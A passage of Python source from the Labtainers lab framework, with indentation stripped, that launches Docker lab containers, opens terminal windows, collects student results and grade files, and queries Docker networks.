logger.debug('did start.config reload from %s' % my_start_config)
return start_config
def CheckEmailReloadStartConfig(start_config, quiet_start, lab_path, labtainer_config, logger, servers, clone_count):
student_email = None
for name, container in start_config.containers.items():
# Obscure means of making sure we have an email and getting one if
# a container has not yet been created.
if not AllContainersCreated(container) and student_email is None:
if student_email == None:
student_email = GetUserEmail(quiet_start)
else:
student_email = GetUserEmail(True)
if student_email == None:
student_email = GetUserEmail(True)
start_config = ReloadStartConfig(lab_path, labtainer_config, start_config, student_email, logger, servers, clone_count)
return start_config, student_email
def pidExists(pid):
"""Check whether pid exists in the current process table.
UNIX only.
"""
if pid <= 0:
return False
try:
os.kill(pid, 0)
except OSError as err:
if err.errno == errno.ESRCH:
# ESRCH == No such process
return False
elif err.errno == errno.EPERM:
# EPERM clearly means there's a process to deny access to
return True
else:
# According to "man 2 kill" possible error values are
# (EINVAL, EPERM, ESRCH)
raise
else:
return True
def ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map):
num_terminal = int(container.terminals)
clone_names = GetContainerCloneNames(container)
for mycontainer_name in clone_names:
#logger.debug("container: %s Number of terminals: %d" % (mycontainer_name, num_terminal))
if mycontainer_name in container_map:
#logger.debug('container %s mapped to %s' % (mycontainer_name, container_map[mycontainer_name]))
mycontainer_name = container_map[mycontainer_name]
CopyFilesToHost(lab_path, container.name, mycontainer_name, container.user)
''' HACK remove after a while.... catch case where framework updated to remove XTERM Instructions, but still using image
that includes instructions, which then consumes a window '''
#if container.xterm is None:
# cmd = "docker exec %s bash -c 'ls -l $HOME/instructions.txt'" % (mycontainer_name)
# if DockerCmd(cmd, noloop=True):
# logger.debug('Found instructions, force xterm')
# container.xterm = 'instructions'
if container.xterm is not None:
logger.debug('container.xterm is <%s>' % container.xterm)
parts = container.xterm.split()
title = parts[0]
command = None
#if title.lower() == 'instructions' and len(parts) == 1:
# command = 'startup.sh'
if len(parts) == 2:
command = parts[1]
else:
logger.error("Bad XTERM entryin in start.config: %s" % container.xterm)
exit(1)
if command is not None:
cmd = 'sh -c "cd /home/%s && .local/bin/%s"' % (container.user, command)
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
# note hack to change --geometry to -geometry
spawn_command = "xterm %s -title %s -sb -rightbar -fa 'Monospace' -fs 11 -e docker exec -it %s %s & 2>/tmp/xterm.out" % (terminal_location[1:],
title, mycontainer_name, cmd)
logger.debug("xterm spawn: %s" % spawn_command)
xterm_pid = subprocess.Popen(shlex.split(spawn_command), stdout=subprocess.PIPE,stderr=subprocess.PIPE, close_fds=True).pid
# race condition, gnome may beat xterm to the startup.sh script
if command == 'startup.sh':
done = False
while pidExists(xterm_pid) and not done:
cmd = 'docker exec -it %s ls -l /tmp/.mylockdir' % mycontainer_name
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if 'No such file or directory' not in output[0].decode('utf-8'):
done = True
else:
time.sleep(0.2)
# If the number of terminals is -1 or zero -- do not spawn
#print('container terms %s is %d' % (mycontainer_name, num_terminal))
if not (num_terminal == 0 or num_terminal == -1):
for x in range(num_terminal):
#sys.stderr.write("%d \n" % terminal_count)
terminal_location, columns, lines = terminalCounter(terminal_count)
#sys.stderr.write("%s \n" % terminal_location)
#sys.stderr.write("%s \n" % mycontainer_name)
cmd = 'bash -l -c bash'
#spawn_command = "gnome-terminal %s -x docker exec -it %s bash -l &" % (terminal_location, mycontainer_name)
if container.terminal_group is not None:
if container.terminal_group not in terminal_groups:
terminal_count += 1
terminal_groups[container.terminal_group] = []
group_command = '"docker exec -it %s %s"' % (mycontainer_name, cmd)
terminal_groups[container.terminal_group].append(group_command)
else:
terminal_count += 1
spawn_command = 'gnome-terminal %s --profile=labtainers -- docker exec -it --env COLUMNS=%d --env LINES=%d %s %s >/dev/null 2>&1 &' % (terminal_location,
columns, lines, mycontainer_name, cmd)
logger.debug("gnome spawn: %s" % spawn_command)
#print spawn_command
os.system(spawn_command)
return terminal_count
def SkipContainer(run_container, name, start_config, servers):
container = start_config.containers[name]
if run_container is not None and container.full_name != run_container:
return True
if servers is not None:
if servers == 'server':
if container.client == 'yes':
return True
elif servers == 'client':
if container.client != 'yes':
return True
return False
def readFirst(lab_path, labname, fname, quiet_start, bail_option=False):
#
# If a fname exists in the lab's config directory, less it before the student continues.
#
doc_dir = os.path.join(lab_path, 'docs')
read_first = os.path.join(doc_dir, fname)
pdf = '%s.pdf' % labname
manual = os.path.join(doc_dir, pdf)
if os.path.isfile(read_first):
print('\n\n')
command = 'cat %s' % read_first
less = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
sed_cmd = "sed -e s+LAB_MANUAL+%s+ -e s+LAB_DOCS+%s+" % (manual, doc_dir)
sed = subprocess.Popen(sed_cmd.split(), stdin=less.stdout, stdout=subprocess.PIPE)
output = sed.communicate()[0].decode('utf-8')
print(output)
if not quiet_start:
less.wait()
if not bail_option:
if sys.version_info >=(3,0):
dumb = input("Press <enter> to start the lab\n")
else:
dumb = raw_input("Press <enter> to start the lab\n")
else:
if sys.version_info >=(3,0):
dumb = input("Continue? (y/n)")
else:
dumb = raw_input("Continue? (y/n)")
if dumb.lower() != 'y':
cmd = 'rm -fr .tmp/%s' % labname
os.system(cmd)
print('Exiting lab')
exit(0)
def DoTerminals(start_config, lab_path, run_container=None, servers=None, container_map={}):
# spawn terminal for each container based on num_terminal
terminal_count = 0
terminal_groups = {}
for name, container in start_config.containers.items():
# Do not spawn terminal if it is regression testing
if SkipContainer(run_container, name, start_config, servers):
print('herez %s' % name)
continue
terminal_count = ContainerTerminals(lab_path, start_config, container, terminal_count, terminal_groups, container_map)
for tg in terminal_groups:
tab_commands = ''
tab = '--window'
for command in terminal_groups[tg]:
tab_commands = tab_commands+' %s -e %s' % (tab, command)
tab = '--tab'
#tab_commands = tab_commands+' --tab %s --' % command
terminal_location, columns, lines = terminalCounter(terminal_count)
terminal_count += 1
spawn_command = 'gnome-terminal %s --profile=labtainers %s >/dev/null 2>&1' % (terminal_location, tab_commands)
FNULL = open(os.devnull, 'w')
result = subprocess.Popen(shlex.split(spawn_command), close_fds=True, stdout=FNULL, stderr=subprocess.STDOUT)
logger.debug("gnome spawn tg: %s" % spawn_command)
#os.system(spawn_command)
def GetWaitTapDir():
user = os.getenv('USER')
wait_tap_dir = os.path.join('/tmp', user, 'wait_tap_dir')
return wait_tap_dir
def GetStartSyncDir():
user = os.getenv('USER')
sync_dir = os.path.join('/tmp', user, 'labtainer_sync')
return sync_dir
def CountStartSync():
sync_dir = GetStartSyncDir()
dlist = os.listdir(sync_dir)
return len(dlist)
def ClearStartSync():
sync_dir = GetStartSyncDir()
shutil.rmtree(sync_dir, ignore_errors=True)
try:
os.makedirs(sync_dir)
except os.error:
logger.error("did not expect to find dir %s" % sync_dir)
def WaitStartSync(container):
wait_dir = os.path.join(GetStartSyncDir(), container)
while not os.path.isdir(wait_dir):
time.sleep(1)
def CreateStartSync(container):
my_dir = os.path.join(GetStartSyncDir(), container)
try:
os.makedirs(my_dir)
except os.error:
logger.error("did not expect to find dir %s" % my_dir)
def DoStart(start_config, labtainer_config, lab_path,
quiet_start, run_container, servers, clone_count, auto_grade=False, debug_grade=False, container_images=None):
labname = os.path.basename(lab_path)
logger.debug("DoStart Multiple Containers and/or multi-home networking")
''' make sure root can access Xserver '''
SetXhost()
apps2start = []
has_multi_container = CheckLabContainerApps(start_config, lab_path, apps2start)
logger.debug("Apps to start is (%s)" % apps2start)
hostSystem_script = os.path.join(lab_path, '*/_bin', 'hostSystemCheck.py')
hostSystemCheckList = glob.glob('%s' % hostSystem_script)
logger.debug("List of hostSystemCheck.py (%s)" % hostSystemCheckList)
# If more than one hostSystemCheck.py - pick first one
if hostSystemCheckList != [] and os.path.isfile(hostSystemCheckList[0]):
# Do Host System Check if necessary (if file exists)
command = "%s" % hostSystemCheckList[0]
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE)
if result == FAILURE:
logger.warning("Host System Check indicates error encountered")
if sys.version_info >=(3,0):
user_input=input("Would you like to quit? (yes/no)\n")
else:
user_input=raw_input("Would you like to quit? (yes/no)\n")
user_input=user_input.strip().lower()
#print "user_input (%s)" % user_input
if user_input == "yes":
sys.exit(1)
# Create SUBNETS
if CreateSubnets(start_config):
''' don't create tapped containers until tap is ready '''
tap_lock_dir = GetWaitTapDir()
lock = os.path.join(tap_lock_dir, 'lock')
try:
os.rmdir(lock)
except:
pass
try:
os.makedirs(tap_lock_dir)
except:
pass
ClearStartSync()
student_email = None
threads = []
results = []
if has_multi_container:
container_warning_printed = False
start_config, student_email = CheckEmailReloadStartConfig(start_config, quiet_start, lab_path,
labtainer_config, logger, servers, clone_count)
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('gonna skip %s' % run_container)
continue
if has_multi_container and container_warning_printed == False:
print("Starting the lab, this may take a moment...")
container_warning_printed = True
image_info = None
if container_images is not None:
logger.debug('container images not none,get for %s' % name)
image_info = container_images[name]
logger.debug('container images got image_info %s' % image_info)
if image_info is None:
print('is none, map is %s' % str(container_images))
t = threading.Thread(target=DoStartOne, args=(labname, name, container, start_config, labtainer_config, lab_path,
student_email, quiet_start, results, auto_grade, image_info))
threads.append(t)
t.setName(name)
t.start()
logger.debug('started all')
progress = 'Started %d containers, %d completed initialization, please wait...\n' % (len(threads), 0)
sys.stdout.write(progress)
for t in threads:
t.join()
logger.debug('joined %s' % t.getName())
dockerPull.moveUp(1)
progress = 'Started %d containers, %d completed initialization. Done.\n' % (len(threads), len(threads))
dockerPull.clearLine()
sys.stdout.write(progress)
if False in results:
DoStop(start_config, labtainer_config, lab_path, False, run_container, servers)
logger.error('DoStartOne has at least one failure!')
sys.exit(1)
readFirst(lab_path, labname, 'read_first.txt', quiet_start)
DoTerminals(start_config, lab_path, run_container=run_container, servers=servers)
if apps2start != [] and not auto_grade:
print("Please wait for the apps (%s) to launch" % apps2start)
syncdir = os.path.join(os.getenv('LABTAINER_DIR'), 'scripts','labtainer-student', '.tmp', labname, 'sync')
logger.debug('syncdir %s' % syncdir)
try:
os.mkdir(syncdir)
except:
pass
logger.debug('Labtainer lab %s started and ready' % labname)
return 0
def terminalCounter(terminal_count):
columns = 100
lines = 25
x_coordinate = columns + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry %dx%d+%d+%d" % (columns, lines, x_coordinate, y_coordinate)
return terminal_location, columns, lines
def terminalWideCounter(terminal_count):
x_coordinate = 100 + ( 50 * terminal_count )
y_coordinate = 75 + ( 50 * terminal_count)
terminal_location = "--geometry 160x35+%d+%d" % (x_coordinate, y_coordinate)
return terminal_location
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
def CreateHostHomeXfer(host_xfer_dir):
# remove trailing '/'
host_xfer_dir = host_xfer_dir.rstrip('/')
logger.debug("host_home_xfer directory (%s)" % host_xfer_dir)
if os.path.exists(host_xfer_dir):
# exists but is not a directory
if not os.path.isdir(host_xfer_dir):
# remove file then create directory
os.remove(host_xfer_dir)
os.makedirs(host_xfer_dir)
#else:
# logger.debug("host_home_xfer directory (%s) exists" % host_xfer_dir)
else:
# does not exists, create directory
try:
os.makedirs(host_xfer_dir)
except FileNotFoundError as ex:
print('The directory %s does not exist. Perhaps a shared volume is not mounted?' % os.path.dirname(host_xfer_dir))
exit(1)
# CopyChownGradesFile
def CopyChownGradesFile(start_config, labtainer_config, name, container_name, container_user, ignore_stop_error):
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
labname = start_config.labname
username = getpass.getuser()
# Copy <labname>.grades.txt file
grade_filename = '/home/%s/%s.grades.txt' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, grade_filename, username, host_home_xfer)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.txt file is %s" % (labname, result))
if result == FAILURE:
# try grabbing instructor.log
command = "docker cp %s:/tmp/instructor.log /tmp/instructor.log" % (container_name)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp instructor.log file is %s" % (result))
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.txt file!\n" % (container_name, labname))
return
# Copy <labname>.grades.json file
gradejson_filename = '/home/%s/%s.grades.json' % (container_user, labname)
command = "docker cp %s:%s /home/%s/%s" % (container_name, gradejson_filename, username, host_home_xfer)
#logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command))
logger.debug("Result of subprocess.Popen exec cp %s.grades.json file is %s" % (labname, result))
if result == FAILURE:
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
if ignore_stop_error:
logger.debug("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
else:
logger.warning("Container %s fail on executing cp %s.grades.json file!\n" % (container_name, labname))
return
def StartLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
labname = os.path.basename(lab_path)
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
logger.debug("current working directory for %s" % mycwd)
logger.debug("current user's home directory for %s" % myhomedir)
logger.debug("ParseStartConfig for %s" % labname)
isValidLab(lab_path)
lab_count = LabCount.addCount('./', labname, is_redo, logger)
if lab_count == 1:
readFirst(lab_path, labname, 'read_pre.txt', quiet_start, bail_option=True)
labtainer_config, start_config = GetBothConfigs(lab_path, logger, servers, clone_count)
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, labname)
LABS_DIR = os.path.abspath('../../labs')
didfix = False
''' hackey assumption about running from labtainers-student or labtainers-instructor '''
container_bin = './bin'
if is_redo or force_build:
my_start_config = os.path.join('./.tmp',labname, 'start.config')
if os.path.isfile(my_start_config):
logger.debug('Cached start.config removed %s' % my_start_config)
os.remove(my_start_config)
x11 = False
container_images = {}
for name, container in start_config.containers.items():
if SkipContainer(run_container, name, start_config, servers):
#print('skipping name %s %s' % (name, start_config.containers[name]))
continue
mycontainer_name = container.full_name
mycontainer_image_name = container.image_name
if container.x11.lower() == 'yes':
x11 = True
if is_redo:
# If it is a redo then always remove any previous container
# If it is not a redo, i.e., start.py then DO NOT remove existing container
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
cmd = 'docker rm %s' % clone_full
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
logger.debug("Command was (%s)" % cmd)
if len(output[1]) > 0:
logger.debug("Error from command = '%s'" % str(output[1].decode('utf-8')))
#image_exists, result, dumb = ImageExists(mycontainer_image_name, container.registry)
if container.registry == labtainer_config.test_registry:
branch, container_registry = registry.getBranchRegistry()
base_registry = container_registry
else:
container_registry = container.registry
base_registry = container.base_registry
image_info = imageInfo(mycontainer_image_name, container_registry, base_registry, labtainer_config, quiet=quiet_start)
container_images[name] = image_info
if image_info is not None:
logger.debug('Image version %s framework_version %s' % (image_info.version, framework_version))
if image_info.version is not None and int(image_info.version) > framework_version:
print('**** Labtainer update required *****')
print('This lab requires that you update your labtainers installation.')
print('Please type: update-labtainer.sh')
print('and then try starting the lab again.')
exit(0)
if not image_info.local:
pullDockerImage(container_registry, mycontainer_image_name)
else:
logger.error('Could not find image info for %s' % name)
exit(1)
# Check existence of /home/$USER/$HOST_HOME_XFER directory - create if necessary
host_xfer_dir = '%s/%s' % (myhomedir, host_home_xfer)
CreateHostHomeXfer(host_xfer_dir)
if x11:
sockets = os.listdir('/tmp/.X11-unix')
if len(sockets) == 0:
print('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
logger.debug('Cannot create X11 windows, the socket is missing. Try rebooting your VM')
exit(1)
DoStart(start_config, labtainer_config, lab_path, quiet_start,
run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade,
debug_grade=debug_grade, container_images=container_images)
def dumb():
pass
'''
'''
def RedoLab(lab_path, force_build=False, is_redo=False, quiet_start=False,
run_container=None, servers=None, clone_count=None, auto_grade=False, debug_grade=False):
mycwd = os.getcwd()
myhomedir = os.environ['HOME']
# Pass 'True' to ignore_stop_error (i.e., ignore certain error encountered during StopLab
# since it might not even be an error)
lab_list, dumb = GetListRunningLabType()
if len(lab_list) > 0:
StopLab(lab_path, True)
is_redo = True
StartLab(lab_path, force_build, is_redo=is_redo, quiet_start=quiet_start,
run_container=run_container, servers=servers, clone_count=clone_count, auto_grade=auto_grade, debug_grade=debug_grade)
def CheckShutdown(lab_path, name, container_name, container_user, ignore_stop_error):
''' NOT USED at the moment '''
done = False
count = 0
while not done:
command='docker cp %s:/tmp/.shutdown_done /tmp/' % (container_name)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
logger.debug("response from docker cp %s" % error)
time.sleep(1)
else:
logger.debug("must have found the shutdown_done file")
done = True
count += 1
if count > 5:
done = True
def PreStop(container_name, ts):
logger.debug("About to call prestop")
cmd_path = '$HOME/.local/bin/prestop'
cmd = "docker exec %s bash -c 'ls -l %s'" % (container_name, cmd_path)
if DockerCmd(cmd, noloop=True):
cmd = "docker exec %s bash -c 'timeout -s SIGTERM 20s %s >$HOME/.local/result/prestop.stdout.%s 2>&1'" % (container_name, cmd_path, ts)
DockerCmd(cmd, noloop=True)
def GatherOtherArtifacts(lab_path, name, container_name, container_user, container_password, ignore_stop_error):
'''
Parse the results.config file looking for files named by absolute paths,
and copy those into the .local/result directory, maintaining the original
directory structure, e.g., .local/result/var/log/foo.log
'''
config_path = os.path.join(lab_path,"instr_config")
results_config_path = os.path.join(config_path,"results.config")
did_file = []
CopyAbsToResult(container_name, '/root/.bash_history', container_user, ignore_stop_error)
did_file.append('/root/.bash_history')
with open (results_config_path) as fh:
for line in fh:
''' container:filename is between "=" and first " : " '''
line = line.strip()
if line.startswith('#') or len(line) == 0:
continue
if '=' not in line:
logger.warning('no = in line %s' % line)
continue
after_equals = line.split('=', 1)[1].strip()
# note assumes field delimeters are space-:-space, vice container:file
fname = after_equals.split(' : ')[0].strip()
is_mine = False
if ':' in fname:
'''
[container_name:]<prog>.[stdin | stdout] | [container_name:]file_path[:time_program]
'''
f_container = None
parts = fname.split(':')
if len(parts) == 2:
if parts[0].startswith('/'):
filename = parts[0]
else:
f_container = parts[0]
filename = parts[1]
elif len(parts) == 3:
f_container = parts[0]
filename = parts[1]
if f_container is not None and f_container.strip() == name:
is_mine = True
filename = filename.strip()
else:
is_mine = True
filename = fname
if is_mine:
if filename.startswith('/') and filename not in did_file:
''' copy from abs path to ~/.local/result '''
logger.debug('file on this container to copy <%s>' % filename )
CopyAbsToResult(container_name, filename, container_user, ignore_stop_error)
did_file.append(filename)
def CopyAbsToResult(container_name, fname, container_user, ignore_stop_error):
''' copy from abs path to ~/.local/result '''
command='docker exec %s mkdir -p /home/%s/.local/result' % (container_name, container_user)
command='docker exec %s sudo cp --parents %s /home/%s/.local/result' % (container_name, fname, container_user)
logger.debug(command)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
else:
logger.debug('error from docker: %s' % error)
logger.debug('command was %s' % command)
#command='docker exec %s echo "%s\n" | sudo -S chmod a+r -R /home/%s/.local/result' % (container_name, container_password, container_user)
command='docker exec %s sudo chmod a+r -R /home/%s/.local/result' % (container_name, container_user)
child = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error = child.stderr.read().decode('utf-8').strip()
if len(error) > 0:
if ignore_stop_error:
logger.debug('chmod ERROR: %s' % error)
logger.debug('command was %s' % command)
else:
logger.error('chmod ERROR: %s' % error)
logger.error('command was %s' % command)
def CreateCopyChownZip(start_config, labtainer_config, name, container_name, container_image, container_user,
container_password, ignore_stop_error, keep_running, running_container=None):
'''
Zip up the student home directory and copy it to the Linux host home directory
'''
logger.debug('in CreateCopyChownZip')
if running_container is None:
running_container = container_name
host_home_xfer = os.path.join(labtainer_config.host_home_xfer, start_config.labname)
# Run 'Student.py' - This will create zip file of the result
logger.debug("About to call Student.py")
''' Copy the Student.py on each stop to handle cases where the parameter list changes.'''
cmd = 'docker cp lab_bin/Student.py %s:/home/%s/.local/bin/' % (running_container, container_user)
if not DockerCmd(cmd):
logger.error('failed to copy Student.py')
cmd_path = '/home/%s/.local/bin/Student.py' % (container_user)
#command=['docker', 'exec', '-i', container_name, 'echo "%s\n" |' % container_password, '/usr/bin/sudo', cmd_path, container_user, container_image]
command=['docker', 'exec', '-i', running_container, '/usr/bin/sudo', cmd_path, container_user, container_image, str(keep_running)]
logger.debug('cmd: %s' % str(command))
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = child.communicate()
''' TBD remaining problems with flushing stdout? '''
#if keep_running and len(output[0].strip()) > 0:
# print('\n<<<<< You may need to stop: %s in order to obtain a complete assessment. >>>>>\n' % output[0].decode('utf-8').strip())
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
else:
logger.error("Container %s fail on executing Student.py %s \n" % (running_container, output[1].decode('utf-8')))
return None, None
logger.debug("results from Student.py: %s" % output[0].decode('utf-8'))
#out_string = output[0].strip()
#if len(out_string) > 0:
# logger.debug('output of Student.py is %s' % out_string)
username = getpass.getuser()
tmp_dir=os.path.join('/tmp/labtainers', container_name)
shutil.rmtree(tmp_dir, ignore_errors=True)
try:
os.makedirs(tmp_dir)
except os.error:
logger.error("did not expect to find dir %s" % tmp_dir)
source_dir = os.path.join('/home', container_user, '.local', 'zip')
cont_source = '%s:%s' % (container_name, source_dir)
logger.debug('will copy from %s ' % source_dir)
command = ['docker', 'cp', cont_source, tmp_dir]
# The zip filename created by Student.py has the format of e-mail.labname.zip
#logger.debug("Command to execute is (%s)" % command)
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8').strip()
if len(error_string) > 0:
if ignore_stop_error:
logger.debug("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.debug("Command was (%s)" % command)
else:
logger.error("Container %s fail on executing cp zip file: %s\n" % (container_name, error_string))
logger.error("Command was (%s)" % command)
clone_names = GetContainerCloneNames(start_config.containers[name])
for clone_full in clone_names:
StopMyContainer(clone_full, ignore_stop_error)
return None, None
local_tmp_zip = os.path.join(tmp_dir, 'zip')
try:
orig_zipfilenameext = os.listdir(local_tmp_zip)[0]
except:
if ignore_stop_error:
logger.debug('no files at %s\n' % local_tmp_zip)
else:
logger.error('no files at %s\n' % local_tmp_zip)
return None, None
orig_zipfilename, orig_zipext = os.path.splitext(orig_zipfilenameext)
baseZipFilename = os.path.basename(orig_zipfilename)
#NOTE: Use the '=' to separate e-mail+labname from the container_name
DestZipFilename = '%s=%s.zip' % (baseZipFilename, container_name)
DestZipPath = os.path.join('/home', username, host_home_xfer, DestZipFilename)
shutil.copyfile(os.path.join(local_tmp_zip, orig_zipfilenameext), DestZipPath)
currentContainerZipFilename = "/home/%s/%s/%s" % (username, host_home_xfer, DestZipFilename)
return baseZipFilename, currentContainerZipFilename
# Stop my_container_name container
def StopMyContainer(container_name, ignore_stop_error):
command = "docker stop -t 1 %s" % container_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
if ignore_stop_error:
logger.debug('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
else:
logger.error('Fail to stop container, error returned %s' % output[1].decode('utf-8'))
#if len(output[0].strip()) > 0:
# logger.debug('StopMyContainer stdout %s' % output[0])
#result = subprocess.call(command, shell=True)
def GetContainerID(image):
command = "docker ps"
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = None
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
elif len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for line in docker_ps_output:
line = line.strip()
if image in line:
parts = line.split()
retval = parts[0]
break
return retval
# Get a list of running lab names
def GetListRunningLabType():
lablist = []
is_gns3 = False
# Note: doing "docker ps" not "docker ps -a" to get just the running container
command = "docker ps"
#logger.debug("GetListRunningLab Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of running containers, error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0].decode('utf-8')) > 0:
docker_ps_output = output[0].decode('utf-8').split('\n')
for each_line in docker_ps_output:
# Skip empty line or the "CONTAINER ID" line - the header line returned by "docker ps"
current_line = each_line.strip()
if not current_line or len(current_line) == 0 or current_line.startswith("CONTAINER"):
continue
logger.debug(current_line)
# Assume the container name is the last token on the line
container_info = current_line.split()
container_name = container_info[-1]
# And the image is the 2nd token
image_name = container_info[1]
image_name = os.path.basename(image_name)
if image_name == 'labtainer.master.headless' or image_name == 'labtainer.headless.tester':
continue
if container_name.startswith(image_name):
''' std Labtainers image, get is labname '''
labname = container_name.split('.')[0]
elif 'labtainer' in image_name:
''' gns3 labtainer image '''
labname = image_name.split('_', 1)[0]
is_gns3 = True
elif container_name.endswith('.student'):
''' docker is sick, changed image name to checksum. '''
labname = container_name.split('.')[0]
else:
logger.debug('not a labtainer: %s' % image_name)
continue
if labname not in lablist:
logger.debug('appending %s' % labname)
lablist.append(labname)
return lablist, is_gns3
def GetListRunningLab():
lab_list, is_gns3 = GetListRunningLabType()
return lab_list
# Given a network name, if it is valid, get a list of labname for the container(s) that is(are)
# using that network. Note: the network name is passed in as an argument
def GetListLabContainerOnNetwork(network_name):
containerlabnamelist = []
command = "docker network inspect %s" % network_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
containers = result["Containers"]
for key in containers:
container_name = containers[key]["Name"]
# Assume the labname is the first token if split by '.'
labname = container_name.split('.')[0]
if labname not in containerlabnamelist:
containerlabnamelist.append(labname)
return containerlabnamelist
# Given an IP address (gateway IP address) - find a network name that has that IP address as its gateway
# Note: the IP address is passed in as an argument
def FindNetworkGivenGatewayIP(gateway_address):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenGatewayIP %s" % gateway_address)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
# Do not need to check network name "bridge"
if network_name != "bridge" and network_name not in networklist:
networklist.append(network_name)
# Loop through each network (driver=bridge) to find if any uses IP address as gateway
for network_name in networklist:
command = "docker network inspect %s" % network_name
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to inspect the network %s, error returned %s' % (network_name, output[1].decode('utf-8')))
sys.exit(1)
if len(output[0]) > 0:
network_result = json.loads(output[0].decode('utf-8'))
if len(network_result) != 0:
result = network_result[0]
ipam_config = result["IPAM"]["Config"][0]
for key in ipam_config:
if key == "Gateway":
ipam_config_gateway_ip = ipam_config[key]
if gateway_address == ipam_config_gateway_ip:
found_match_network = True
found_match_network_name = network_name
break
return found_match_network, found_match_network_name
# Given a subnet (network subnet) - find a network name that has that same subnet
# Note: the subnet is passed in as an argument
def FindNetworkGivenSubnet(subnet):
found_match_network = False
found_match_network_name = ""
logger.debug("FindNetworkGivenSubnet %s" % subnet)
networklist = []
# First get a list of network name of driver=bridge
command = "docker network ls --filter driver=bridge"
#logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) > 0:
logger.error('Fail to get a list of network (driver=bridge), error returned %s' % output[1].decode('utf-8'))
sys.exit(1)
if len(output[0]) > 0:
network_list = output[0].decode('utf-8').split('\n')
for each_line in network_list:
# Skip empty line or the "NETWORK ID" line - the header line returned by "docker network"
current_line = each_line.strip()
if not current_line or current_line.startswith("NETWORK"):
continue
# Assume the network name is the second token on the line
container_info = current_line.split()
network_name = container_info[1]
